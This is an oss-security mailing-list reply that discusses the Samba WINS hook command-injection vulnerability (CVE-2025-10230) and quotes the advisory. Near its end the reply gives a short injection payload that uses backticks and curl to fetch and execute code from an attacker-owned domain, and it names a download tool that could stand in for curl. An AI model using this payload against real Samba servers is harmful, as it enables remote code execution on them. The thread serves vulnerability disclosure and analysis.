RE: Samba security releases for CVE-2025-10230 and CVE-2025-9640

["Caveney, Seamus G" <sgcaveney () seattleschools org>]

-----Original Message-----
From: Douglas Bagnall <douglas.bagnall () catalyst net nz> 
Sent: Wednesday, October 15, 2025 11:51 AM
To: oss-security () lists openwall com
Subject: [oss-security] Samba security releases for CVE-2025-10230 and CVE-2025-9640

> [snip]

> If a Samba server has WINS support enabled (it is off by default), and it has a 'wins hook' parameter specified, the
> program specified by that parameter will be run whenever a WINS name is changed.
> The WINS server used by the Samba Active Directory Domain Controller did not validate the names passed to the wins
> hook program, and it passed them by inserting them into a string run by a shell.
> WINS is an obsolete and trusting protocol, and clients can request any name that fits within the 15 character NetBIOS
> limit. This includes some shell metacharacters, making it possible to run arbitrary commands on the host.
> The WINS server used by Samba when it is not a domain controller is unaffected.

Illegal characters in a NetBIOS hostname are:

\ / : * ? " < > | ,

notably excluding backticks and semicolons. I'm not deeply familiar with the Samba code base but a glance at nbtname.c
and winsserver.c seems to suggest that those character limitations aren't enforced at the protocol level, so it might be
possible to use pipes, redirects or exec a local binary with a short path. Otherwise, the easiest exploitable payload I
can think of would be:

;`curl ab.cd`;

which fits the restrictions at only 14 characters (replace with your favourite short-named download tool that writes to
STDOUT by default - looks like RHEL-likes are one of the few distros still shipping /usr/bin/GET as part of perl LWP).
Requiring an attacker to own a 2-3 letter domain on a 2-3 letter TLD limits the attack surface quite a bit but it isn't
unheard of. I'd be interested to see if anybody has a living Samba install configured as a DC with WINS still running in
2025.